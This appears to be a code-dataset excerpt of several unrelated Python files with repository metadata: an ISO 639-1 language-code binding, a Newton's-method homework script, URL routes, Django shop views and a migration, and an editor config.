Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://ddex.net/xml/20100121/iso639a2}LanguageCode
class LanguageCode (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
"""An ISO639-1 two-letter code representing a Language."""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'LanguageCode')
_XSDLocation = pyxb.utils.utility.Location('http://ddex.net/xml/20100121/iso639a2.xsd', 3, 4)
_Documentation = 'An ISO639-1 two-letter code representing a Language.'
LanguageCode._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=LanguageCode, enum_prefix=None)
LanguageCode.aa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='aa', tag='aa')
LanguageCode.ab = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ab', tag='ab')
LanguageCode.ae = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ae', tag='ae')
LanguageCode.af = LanguageCode._CF_enumeration.addEnumeration(unicode_value='af', tag='af')
LanguageCode.ak = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ak', tag='ak')
LanguageCode.am = LanguageCode._CF_enumeration.addEnumeration(unicode_value='am', tag='am')
LanguageCode.an = LanguageCode._CF_enumeration.addEnumeration(unicode_value='an', tag='an')
LanguageCode.ar = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ar', tag='ar')
LanguageCode.as_ = LanguageCode._CF_enumeration.addEnumeration(unicode_value='as', tag='as_')
LanguageCode.av = LanguageCode._CF_enumeration.addEnumeration(unicode_value='av', tag='av')
LanguageCode.ay = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ay', tag='ay')
LanguageCode.az = LanguageCode._CF_enumeration.addEnumeration(unicode_value='az', tag='az')
LanguageCode.ba = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ba', tag='ba')
LanguageCode.be = LanguageCode._CF_enumeration.addEnumeration(unicode_value='be', tag='be')
LanguageCode.bg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bg', tag='bg')
LanguageCode.bh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bh', tag='bh')
LanguageCode.bi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bi', tag='bi')
LanguageCode.bm = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bm', tag='bm')
LanguageCode.bn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bn', tag='bn')
LanguageCode.bo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bo', tag='bo')
LanguageCode.br = LanguageCode._CF_enumeration.addEnumeration(unicode_value='br', tag='br')
LanguageCode.bs = LanguageCode._CF_enumeration.addEnumeration(unicode_value='bs', tag='bs')
LanguageCode.ca = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ca', tag='ca')
LanguageCode.ce = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ce', tag='ce')
LanguageCode.ch = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ch', tag='ch')
LanguageCode.co = LanguageCode._CF_enumeration.addEnumeration(unicode_value='co', tag='co')
LanguageCode.cr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cr', tag='cr')
LanguageCode.cs = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cs', tag='cs')
LanguageCode.cu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cu', tag='cu')
LanguageCode.cv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cv', tag='cv')
LanguageCode.cy = LanguageCode._CF_enumeration.addEnumeration(unicode_value='cy', tag='cy')
LanguageCode.da = LanguageCode._CF_enumeration.addEnumeration(unicode_value='da', tag='da')
LanguageCode.de = LanguageCode._CF_enumeration.addEnumeration(unicode_value='de', tag='de')
LanguageCode.dv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='dv', tag='dv')
LanguageCode.dz = LanguageCode._CF_enumeration.addEnumeration(unicode_value='dz', tag='dz')
LanguageCode.ee = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ee', tag='ee')
LanguageCode.el = LanguageCode._CF_enumeration.addEnumeration(unicode_value='el', tag='el')
LanguageCode.en = LanguageCode._CF_enumeration.addEnumeration(unicode_value='en', tag='en')
LanguageCode.eo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='eo', tag='eo')
LanguageCode.es = LanguageCode._CF_enumeration.addEnumeration(unicode_value='es', tag='es')
LanguageCode.et = LanguageCode._CF_enumeration.addEnumeration(unicode_value='et', tag='et')
LanguageCode.eu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='eu', tag='eu')
LanguageCode.fa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fa', tag='fa')
LanguageCode.ff = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ff', tag='ff')
LanguageCode.fi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fi', tag='fi')
LanguageCode.fj = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fj', tag='fj')
LanguageCode.fo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fo', tag='fo')
LanguageCode.fr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fr', tag='fr')
LanguageCode.fy = LanguageCode._CF_enumeration.addEnumeration(unicode_value='fy', tag='fy')
LanguageCode.ga = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ga', tag='ga')
LanguageCode.gd = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gd', tag='gd')
LanguageCode.gl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gl', tag='gl')
LanguageCode.gn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gn', tag='gn')
LanguageCode.gu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gu', tag='gu')
LanguageCode.gv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='gv', tag='gv')
LanguageCode.ha = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ha', tag='ha')
LanguageCode.he = LanguageCode._CF_enumeration.addEnumeration(unicode_value='he', tag='he')
LanguageCode.hi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hi', tag='hi')
LanguageCode.ho = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ho', tag='ho')
LanguageCode.hr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hr', tag='hr')
LanguageCode.ht = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ht', tag='ht')
LanguageCode.hu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hu', tag='hu')
LanguageCode.hy = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hy', tag='hy')
LanguageCode.hz = LanguageCode._CF_enumeration.addEnumeration(unicode_value='hz', tag='hz')
LanguageCode.ia = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ia', tag='ia')
LanguageCode.id = LanguageCode._CF_enumeration.addEnumeration(unicode_value='id', tag='id')
LanguageCode.ie = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ie', tag='ie')
LanguageCode.ig = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ig', tag='ig')
LanguageCode.ii = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ii', tag='ii')
LanguageCode.ik = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ik', tag='ik')
LanguageCode.io = LanguageCode._CF_enumeration.addEnumeration(unicode_value='io', tag='io')
LanguageCode.is_ = LanguageCode._CF_enumeration.addEnumeration(unicode_value='is', tag='is_')
LanguageCode.it = LanguageCode._CF_enumeration.addEnumeration(unicode_value='it', tag='it')
LanguageCode.iu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='iu', tag='iu')
LanguageCode.ja = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ja', tag='ja')
LanguageCode.jv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='jv', tag='jv')
LanguageCode.ka = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ka', tag='ka')
LanguageCode.kg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kg', tag='kg')
LanguageCode.ki = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ki', tag='ki')
LanguageCode.kj = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kj', tag='kj')
LanguageCode.kk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kk', tag='kk')
LanguageCode.kl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kl', tag='kl')
LanguageCode.km = LanguageCode._CF_enumeration.addEnumeration(unicode_value='km', tag='km')
LanguageCode.kn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kn', tag='kn')
LanguageCode.ko = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ko', tag='ko')
LanguageCode.kr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kr', tag='kr')
LanguageCode.ks = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ks', tag='ks')
LanguageCode.ku = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ku', tag='ku')
LanguageCode.kv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kv', tag='kv')
LanguageCode.kw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='kw', tag='kw')
LanguageCode.ky = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ky', tag='ky')
LanguageCode.la = LanguageCode._CF_enumeration.addEnumeration(unicode_value='la', tag='la')
LanguageCode.lb = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lb', tag='lb')
LanguageCode.lg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lg', tag='lg')
LanguageCode.li = LanguageCode._CF_enumeration.addEnumeration(unicode_value='li', tag='li')
LanguageCode.ln = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ln', tag='ln')
LanguageCode.lo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lo', tag='lo')
LanguageCode.lt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lt', tag='lt')
LanguageCode.lu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lu', tag='lu')
LanguageCode.lv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='lv', tag='lv')
LanguageCode.mg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mg', tag='mg')
LanguageCode.mh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mh', tag='mh')
LanguageCode.mi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mi', tag='mi')
LanguageCode.mk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mk', tag='mk')
LanguageCode.ml = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ml', tag='ml')
LanguageCode.mn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mn', tag='mn')
LanguageCode.mo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mo', tag='mo')
LanguageCode.mr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mr', tag='mr')
LanguageCode.ms = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ms', tag='ms')
LanguageCode.mt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='mt', tag='mt')
LanguageCode.my = LanguageCode._CF_enumeration.addEnumeration(unicode_value='my', tag='my')
LanguageCode.na = LanguageCode._CF_enumeration.addEnumeration(unicode_value='na', tag='na')
LanguageCode.nb = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nb', tag='nb')
LanguageCode.nd = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nd', tag='nd')
LanguageCode.ne = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ne', tag='ne')
LanguageCode.ng = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ng', tag='ng')
LanguageCode.nl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nl', tag='nl')
LanguageCode.nn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nn', tag='nn')
LanguageCode.no = LanguageCode._CF_enumeration.addEnumeration(unicode_value='no', tag='no')
LanguageCode.nr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nr', tag='nr')
LanguageCode.nv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='nv', tag='nv')
LanguageCode.ny = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ny', tag='ny')
LanguageCode.oc = LanguageCode._CF_enumeration.addEnumeration(unicode_value='oc', tag='oc')
LanguageCode.oj = LanguageCode._CF_enumeration.addEnumeration(unicode_value='oj', tag='oj')
LanguageCode.om = LanguageCode._CF_enumeration.addEnumeration(unicode_value='om', tag='om')
LanguageCode.or_ = LanguageCode._CF_enumeration.addEnumeration(unicode_value='or', tag='or_')
LanguageCode.os = LanguageCode._CF_enumeration.addEnumeration(unicode_value='os', tag='os')
LanguageCode.pa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pa', tag='pa')
LanguageCode.pi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pi', tag='pi')
LanguageCode.pl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pl', tag='pl')
LanguageCode.ps = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ps', tag='ps')
LanguageCode.pt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='pt', tag='pt')
LanguageCode.qu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='qu', tag='qu')
LanguageCode.rm = LanguageCode._CF_enumeration.addEnumeration(unicode_value='rm', tag='rm')
LanguageCode.rn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='rn', tag='rn')
LanguageCode.ro = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ro', tag='ro')
LanguageCode.ru = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ru', tag='ru')
LanguageCode.rw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='rw', tag='rw')
LanguageCode.sa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sa', tag='sa')
LanguageCode.sc = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sc', tag='sc')
LanguageCode.sd = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sd', tag='sd')
LanguageCode.se = LanguageCode._CF_enumeration.addEnumeration(unicode_value='se', tag='se')
LanguageCode.sg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sg', tag='sg')
LanguageCode.si = LanguageCode._CF_enumeration.addEnumeration(unicode_value='si', tag='si')
LanguageCode.sk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sk', tag='sk')
LanguageCode.sl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sl', tag='sl')
LanguageCode.sm = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sm', tag='sm')
LanguageCode.sn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sn', tag='sn')
LanguageCode.so = LanguageCode._CF_enumeration.addEnumeration(unicode_value='so', tag='so')
LanguageCode.sq = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sq', tag='sq')
LanguageCode.sr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sr', tag='sr')
LanguageCode.ss = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ss', tag='ss')
LanguageCode.st = LanguageCode._CF_enumeration.addEnumeration(unicode_value='st', tag='st')
LanguageCode.su = LanguageCode._CF_enumeration.addEnumeration(unicode_value='su', tag='su')
LanguageCode.sv = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sv', tag='sv')
LanguageCode.sw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='sw', tag='sw')
LanguageCode.ta = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ta', tag='ta')
LanguageCode.te = LanguageCode._CF_enumeration.addEnumeration(unicode_value='te', tag='te')
LanguageCode.tg = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tg', tag='tg')
LanguageCode.th = LanguageCode._CF_enumeration.addEnumeration(unicode_value='th', tag='th')
LanguageCode.ti = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ti', tag='ti')
LanguageCode.tk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tk', tag='tk')
LanguageCode.tl = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tl', tag='tl')
LanguageCode.tn = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tn', tag='tn')
LanguageCode.to = LanguageCode._CF_enumeration.addEnumeration(unicode_value='to', tag='to')
LanguageCode.tr = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tr', tag='tr')
LanguageCode.ts = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ts', tag='ts')
LanguageCode.tt = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tt', tag='tt')
LanguageCode.tw = LanguageCode._CF_enumeration.addEnumeration(unicode_value='tw', tag='tw')
LanguageCode.ty = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ty', tag='ty')
LanguageCode.ug = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ug', tag='ug')
LanguageCode.uk = LanguageCode._CF_enumeration.addEnumeration(unicode_value='uk', tag='uk')
LanguageCode.ur = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ur', tag='ur')
LanguageCode.uz = LanguageCode._CF_enumeration.addEnumeration(unicode_value='uz', tag='uz')
LanguageCode.ve = LanguageCode._CF_enumeration.addEnumeration(unicode_value='ve', tag='ve')
LanguageCode.vi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='vi', tag='vi')
LanguageCode.vo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='vo', tag='vo')
LanguageCode.wa = LanguageCode._CF_enumeration.addEnumeration(unicode_value='wa', tag='wa')
LanguageCode.wo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='wo', tag='wo')
LanguageCode.xh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='xh', tag='xh')
LanguageCode.yi = LanguageCode._CF_enumeration.addEnumeration(unicode_value='yi', tag='yi')
LanguageCode.yo = LanguageCode._CF_enumeration.addEnumeration(unicode_value='yo', tag='yo')
LanguageCode.za = LanguageCode._CF_enumeration.addEnumeration(unicode_value='za', tag='za')
LanguageCode.zh = LanguageCode._CF_enumeration.addEnumeration(unicode_value='zh', tag='zh')
LanguageCode.zu = LanguageCode._CF_enumeration.addEnumeration(unicode_value='zu', tag='zu')
LanguageCode._InitializeFacetMap(LanguageCode._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'LanguageCode', LanguageCode)
| [
"cyprien@trax-air.com"
] | cyprien@trax-air.com |
4d584e485a3f78a66bcd0ef4343df4bf33fdb29f | f059a704022b447f166aaee9648a9edd2326bbd3 | /hw1.py | e831e69ae8d9043604fe80d93bd6c3916536102c | [] | no_license | cheecheelin/PIC97-HW1 | 55c27760c88ac8055a05f515b33023c71c156309 | 717b08e9625ce638bea07b73441fa84d857c4a58 | refs/heads/master | 2021-01-10T13:32:37.061950 | 2016-01-08T01:38:00 | 2016-01-08T01:38:00 | 49,236,875 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | #!/usr/bin/python
#Cheechee Lin PIC 97 HW 1 01/07/2016
#Newton's Method for given test cases
import math
#hardcoded functions and their derivatives
def f(x):
return x**2-1
def df(x):
return (2*x)
def g(x):
return math.sin(x)
def dg(x):
return math.cos(x)
def h(x):
return math.log1p(x-1)-1
def dh(x):
return 1/x
#Newton's Method
def newton(func,dfunc,x,eps):
xi=x
#if magnitude of residual error is less than or equal to eps then done, else calculate correction to guess
while math.fabs(func(xi))>eps:
xi= xi-float(func(xi)/dfunc(xi))
return xi
print newton(f,df,3,0.0001)
print newton (f,df,-0.5,0.0001)
print newton (g,dg,2,0.0001)
print newton (h,dh,1.5,0.0001) | [
"cheecheelin@s-169-232-112-198.resnet.ucla.edu"
] | cheecheelin@s-169-232-112-198.resnet.ucla.edu |
00e61e3359148ae5195cff96ee8a1f87917fa3ba | 6f05f7d5a67b6bb87956a22b988067ec772ba966 | /data/test/python/e0a24819976e888969becc8f9ec8d2f0e7e377efurls.py | e0a24819976e888969becc8f9ec8d2f0e7e377ef | [
"MIT"
] | permissive | harshp8l/deep-learning-lang-detection | 93b6d24a38081597c610ecf9b1f3b92c7d669be5 | 2a54293181c1c2b1a2b840ddee4d4d80177efb33 | refs/heads/master | 2020-04-07T18:07:00.697994 | 2018-11-29T23:21:23 | 2018-11-29T23:21:23 | 158,597,498 | 0 | 0 | MIT | 2018-11-21T19:36:42 | 2018-11-21T19:36:41 | null | UTF-8 | Python | false | false | 591 | py | #coding:utf-8
from controller.index import Index
from controller.article import Article
from controller.signin import Signin
from controller.write import Write
from controller.signout import Signout
from controller.page import About,Type
from controller.api import Article as ART,Comment as com
urls = [
#首页
(r'/', Index),
#文章
(r'/article/([^\n]*)',Article),
#登录
(r'/signin',Signin),
#发表
(r'/write',Write),
#API文章
(r'/api/article/([^\n]*)',ART),
(r'/api/comment',com),
#退出
(r'/signout',Signout),
#关于
(r'/about',About),
# 分类
(r'/type',Type)
] | [
"aliostad+github@gmail.com"
] | aliostad+github@gmail.com |
9f75ae87e95dc57ac67393197c8c4f72c083c8d7 | bf634c1048818482108630b6e88cd1c36fd2051e | /pages/views.py | 33ef90efc6ff1239fb73e01f62927fb02ece2064 | [] | no_license | ssandhu2/real-estate | c1679a079f2a9ca49674f292cbd038e69ea4da35 | 6d0122ebc749e58534b18a3b3ebdef1ac08ac7f7 | refs/heads/master | 2022-09-16T21:52:29.474119 | 2020-06-02T22:17:19 | 2020-06-02T22:17:19 | 267,181,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 869 | py | from django.shortcuts import render
from django.http import HttpResponse
from listings.choices import price_choices, bedroom_choices, state_choices
from listings.models import Listing
from realtors.models import Realtor
# Create your views here.
def index(request):
listings = Listing.objects.order_by('-list_date').filter(is_published= True)[:3]
context= {
'listings': listings,
'state_choices': state_choices,
'bedroom_choices': bedroom_choices,
'price_choices': price_choices
}
return render(request, 'pages/index.html', context)
def about(request):
realtors = Realtor.objects.order_by('-hire_date')
mvp_realtors = Realtor.objects.all().filter(is_mvp=True)
context = {
'realtors': realtors,
'mvp_realtors': mvp_realtors
}
return render(request, 'pages/about.html', context)
| [
"ssandhu2@mail.sfsu.edu"
] | ssandhu2@mail.sfsu.edu |
0409a469c17ce694cb44bf0103a68ba43fa98d38 | edd8d9a157b4d1235f6ff38c62023e451af3699e | /.ycm_extra_conf.py | 80cd16046c020fe24d6788715d2927767a1b6ea4 | [
"BSD-3-Clause"
] | permissive | Magnutic/mg-engine | 34ff93669df3d62aff42d76513886c137dfa0620 | 3078c7248f86e637dc306dd3c9cf8496918219cc | refs/heads/master | 2023-03-08T16:22:57.564915 | 2023-02-23T20:03:09 | 2023-02-23T20:03:09 | 152,069,616 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 984 | py | import os
flags = [
'-Wall',
'-Wextra',
'-Wdeprecated',
'-Wshadow',
'-Wnon-virtual-dtor',
'-Wconversion',
'-std=c++20',
'-x', 'c++',
'-I', './external/mg_dependencies/include',
'-I', './external/mg_dependencies/include/bullet',
'-I', './external/mg_dependencies/function2/include',
'-I', './external/mg_dependencies/optional/include',
'-I', './external/mg_dependencies/plf_colony',
'-I', './external/mg_dependencies/stb',
'-I', './external/mg_dependencies/imgui',
'-I', './external/mg_dependencies/utf8.h',
'-I', './external/glad/include',
'-I', './include',
'-I', './src',
'-I', './build/deps/include',
'-isystem', '/usr/local/include',
'-DGLM_FORCE_XYZW_ONLY=1'
]
def DirectoryOfThisScript():
return os.path.dirname(os.path.abspath(__file__))
def Settings(filename, **kwargs ):
return {
'flags': flags,
'include_paths_relative_to_dir': DirectoryOfThisScript()
}
| [
"magnus@magnutic.se"
] | magnus@magnutic.se |
8c2f1bde7ab7e0d2f103fb80187f0bda6d09a429 | c453bd099dc332aac92ef03d8c18eaed894c3f81 | /bb_Implementation/Implementation_2.py | 5fcde98e3520276606e6f3a31c71c1f4acd2446e | [] | no_license | taegyoo1104/Study_For_Algo_Python | 562925c39df9931adc8559832895da189b7b3c0b | 39ec21c73b5d8382b2ad2d43f51c2857ae5de68d | refs/heads/master | 2023-08-18T16:25:07.875513 | 2021-10-10T15:37:41 | 2021-10-10T15:37:41 | 363,493,234 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 251 | py | datas = input()
result = []
value = 0
for data in datas:
if data.isalpha():
result.append(data)
else:
value += int(data)
if value == 0:
print(''.join(result))
else:
result.append(str(value))
print(''.join(result)) | [
"taegyoo1104@gmail.com"
] | taegyoo1104@gmail.com |
9fc32ab67edcc463d7d73686dd60e399151ee4ec | 5d80aa8893a5d76e45bc674c6f2c5009521197d2 | /eshop/views.py | 90229e3bc1b9e10781d316339e4003912e0b6727 | [] | no_license | belAnosovAs/prostie-zakupki | f42af9289c776b685f37f3f2555c2e911e59d251 | 5fd0b994eca6ef5bce445de6cbaefcc73e35f68a | refs/heads/master | 2016-09-10T12:27:58.235920 | 2012-03-15T12:04:27 | 2012-03-15T12:04:27 | 3,645,967 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,687 | py | from django.shortcuts import render_to_response
from first_site.eshop.models import *
def purchase_type_list(request):
type_list = PurchaseType.objects.all()
return render_to_response('purchase_type_list.html', {'type_list':type_list})
def purchase_list(request, purchase_type, category_id):
    """Render the purchases matching a type and category.

    Both URL fragments arrive as strings; non-numeric values fall back to 0
    so the filter below simply matches nothing.
    """
    try:
        category_id = int(category_id)
    except ValueError:
        category_id = 0
        #raise Http404()
    try:
        purchase_type = int(purchase_type)
    except ValueError:
        purchase_type = 0
        #raise Http404()
    purchase_list = Purchase.objects.filter(type=purchase_type, category=category_id)
    # ``purchase_type`` is rebound from an int id to a model instance (or None).
    try:
        purchase_type=PurchaseType.objects.get(id=purchase_type)
    except PurchaseType.DoesNotExist:
        purchase_type=None
    # NOTE(review): ``category`` is looked up but never passed to the template
    # below — presumably dead code or a missing context entry; verify.
    try:
        category=Category.objects.get(id=category_id)
    except Category.DoesNotExist:
        category=None
    return render_to_response('purchase_list.html', {'purchase_type':purchase_type, 'purchase_list':purchase_list})
def purchase_detail(request, purchase_id):
    """Render one purchase together with its products.

    ``purchase_id`` arrives as a string; a non-numeric value falls back to 0
    so the lookups below find nothing and ``purchase`` renders as None.
    """
    try:
        purchase_id = int(purchase_id)
    except ValueError:
        purchase_id=0
    product_list = Product.objects.filter(purchase=purchase_id)
    try:
        purchase=Purchase.objects.get(id=purchase_id)
    except Purchase.DoesNotExist:
        purchase=None
    return render_to_response('purchase_detail.html', {'purchase':purchase, 'product_list':product_list})
def product_detail(request, product_id):
    """Render the detail page for a single product.

    ``product_id`` arrives as a URL fragment (string); a non-numeric value
    falls back to 0 so the lookup below simply finds no product.
    """
    try:
        product_id = int(product_id)
    except ValueError:
        # BUG FIX: this branch previously assigned ``purchase_id = 0`` (a name
        # copied from purchase_detail), leaving ``product_id`` as the invalid
        # string and crashing the ORM lookup below.
        product_id = 0
    try:
        product = Product.objects.get(id=product_id)
    except Product.DoesNotExist:
        product = None
    return render_to_response('product_detail.html', {'product': product})
"belAnosovAS@gmail.com"
] | belAnosovAS@gmail.com |
35ee7b5437dd10190f3ee588717aa50e422987a6 | 9c3cfbb186d23c698a112ecfdd2ab51032b0a9ff | /app/migrations/0016_auto_20210614_2320.py | 00c65fbcabee348a95fa5a797fc6285f61729e78 | [] | no_license | Sadiq290/TMC | e712d3b378399b8baf458187777a1c25a8f8fd2c | ee185285344faec0b83f13a5f43cb61d9e1bc029 | refs/heads/main | 2023-08-07T23:57:44.361324 | 2021-09-27T17:13:30 | 2021-09-27T17:13:30 | 410,975,267 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 365 | py | # Generated by Django 3.1 on 2021-06-14 17:20
from django.db import migrations
class Migration(migrations.Migration):
    # Renames CampTrainer.institutuion -> instituion.
    # NOTE(review): both the old and new spellings are misspellings of
    # "institution" — the rename only swaps one typo for another; verify intent.
    dependencies = [
        ('app', '0015_camptrainer'),
    ]
    operations = [
        migrations.RenameField(
            model_name='camptrainer',
            old_name='institutuion',
            new_name='instituion',
        ),
    ]
| [
"sadiqmumu27@gmail.com"
] | sadiqmumu27@gmail.com |
